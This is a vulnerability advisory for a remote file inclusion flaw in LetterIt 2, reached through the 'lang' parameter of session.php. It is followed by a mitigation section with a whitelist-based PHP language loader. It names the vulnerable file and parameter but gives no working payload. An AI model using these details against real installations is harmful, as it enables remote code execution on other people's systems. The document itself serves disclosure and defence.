Vendor: LetterIt
By: v1per-haCker
CVSS: 9.3 (HIGH)
Vulnerability Type: Remote File Inclusion (RFI)
CWE: 98
Product Name: LetterIt
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

LetterIt (RFI)
LetterIt 2 is vulnerable to Remote File Inclusion (RFI) through the 'lang' parameter of the 'session.php' file. An attacker who sends a crafted URL in a GET request can make the application include an attacker-controlled file, which results in arbitrary code execution on the vulnerable system.
Mitigation:
The application should validate the 'lang' value before using it in an include and reject anything that is not on a whitelist of allowed values or characters, so that remote URLs and file paths are never passed to the include.
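As an added illustration of that mitigation (example code, not LetterIt's own source), the loader below resolves the 'lang' parameter against a fixed whitelist of known language files instead of handing the raw value to include(). The file names, the 'lang' directory and the default language are assumptions for the example.

```php
<?php
// Added example, not LetterIt's code. The RFI class described above arises when a
// request parameter is passed to include()/require() unchecked, e.g. something of the
// form include($_GET['lang']). The hardened loader below never includes the raw value.

// Constructed whitelist: the only language files this application knows about.
const LANG_FILES = [
    'en' => 'en.php',
    'de' => 'de.php',
    'fr' => 'fr.php',
];
// Hypothetical directory that holds the language files.
const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANG = 'en';

/**
 * Map the requested language onto a local file path, or return null if the value
 * is not an exact whitelist key. Because only the mapped file name is ever used,
 * URLs, absolute paths and traversal sequences in the input cannot reach include().
 */
function resolveLangFile(?string $lang): ?string
{
    if ($lang === null || !array_key_exists($lang, LANG_FILES)) {
        return null;
    }
    return LANG_DIR . '/' . LANG_FILES[$lang];
}

/**
 * Load the language file for a request. Unknown values fall back to the default
 * rather than being trusted; the rejection is also worth logging for detection.
 */
function loadLanguage(array $get): void
{
    $file = resolveLangFile($get['lang'] ?? null);
    if ($file === null) {
        error_log('rejected lang value: ' . var_export($get['lang'] ?? null, true));
        $file = LANG_DIR . '/' . LANG_FILES[DEFAULT_LANG];
    }
    require $file;
}

// Defence in depth: with allow_url_include=Off in php.ini (the PHP default),
// include() refuses remote URLs even if a raw parameter were ever to reach it.
loadLanguage($_GET);
```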